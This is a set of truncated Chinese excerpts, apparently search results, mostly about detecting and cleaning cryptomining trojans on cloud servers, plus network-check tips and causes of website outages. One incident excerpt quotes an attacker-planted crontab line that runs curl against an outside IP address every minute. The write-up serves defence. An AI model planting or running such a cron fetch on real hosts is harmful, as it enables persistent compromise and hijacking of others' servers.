一般情況下，挖礦病毒都是自動掃描+自動掛馬生成的，並不會是有專人進行攻擊，所以也比較好清除，注意清除之后需要 check 有無后門。 最重要幾點（也可能是被hack的原因）：禁止 ROOT 用戶登陸，ROOT 不能使用弱密碼，FRP 需要配置，不能使用默認選項。 挖礦進程占用的 CPU 資源 ...

什么是挖礦木馬 挖礦木馬會占用CPU進行超頻運算，從而占用主機大量的CPU資源，嚴重影響服務器上的其他應用的正常運行。黑客為了得到更多的算力資源，一般都會對全網進行無差別掃描，同時利用SSH爆破和漏洞利用等手段攻擊主機。部分挖礦木馬還具備蠕蟲化的特點，在主機被成功入侵之后，挖礦木馬還會向內網滲透 ...

一、什么是挖礦木馬 挖礦木馬會占用CPU進行超頻運算，從而占用主機大量的CPU資源，嚴重影響服務器上的其他應用的正常運行。黑客為了得到更多的算力資源，一般都會對全網進行無差別掃描，同時利用SSH爆破和漏洞利用等手段攻擊主機。部分挖礦木馬還具備蠕蟲化的特點，在主機被成功入侵之后，挖礦木馬還會向內 ...

1. 先測試網絡能否ping通: ping 遠程 IP 2. 如果網絡能ping通表示網絡連接正常，然后就要測試端口： telnet 遠程IP 端口 3. 如果telnet不上，要考慮一下服務器是否有防火牆攔截： Centos7是查看防火牆是否運行 ...

雲服務器ECS挖礦木馬病毒處理和解決方案 最近由於網絡環境安全意識低的原因，導致一些雲服務器ECS中了挖礦病毒的坑。 總結了一些解決挖礦病毒的一些思路。由於病毒更新速度快僅供參考。 1、查看cpu爆滿的進程 cpu占用率 100%, 用top 查看cpu100 2、殺死進程 ...

線上服務器用的是某訊雲的，歡快的完美運行着Tomcat，MySQL，MongoDB，ActiveMQ等程序。突然一則噩耗從前線傳來：網站不能訪問了。 此項目是我負責，我以150+的手速立即打開了服務器，看到Tomcat掛了，然后順其自然的重啟，啟動過程中直接被killed，再試試數據庫，同樣 ...

最近emr集群跑任務的時候總出現 task failed ，優化sql，調提交任務參數都沒解決，最后再我排查時候，發現一個從節點的cpu使用800% 經過一些列排查，發現是被注入木馬了， #被人種下的crontab#* * * * * curl -s http://158.69.133.17 ...

網站崩潰的原因 1.訪問量過高，超出系統承載能力 2.這個訪問量，不僅包括正常訪問，也有異常訪問的，包括攻擊在內。（黑客攻擊，黑客領用軟件請求服務器所有端口，但是不釋放端口，就導致其他用戶進不了這個網站。） 3.服務器配置過低，低於預期網站發展的設想，雖然是超負載，但是因為配置太低 ...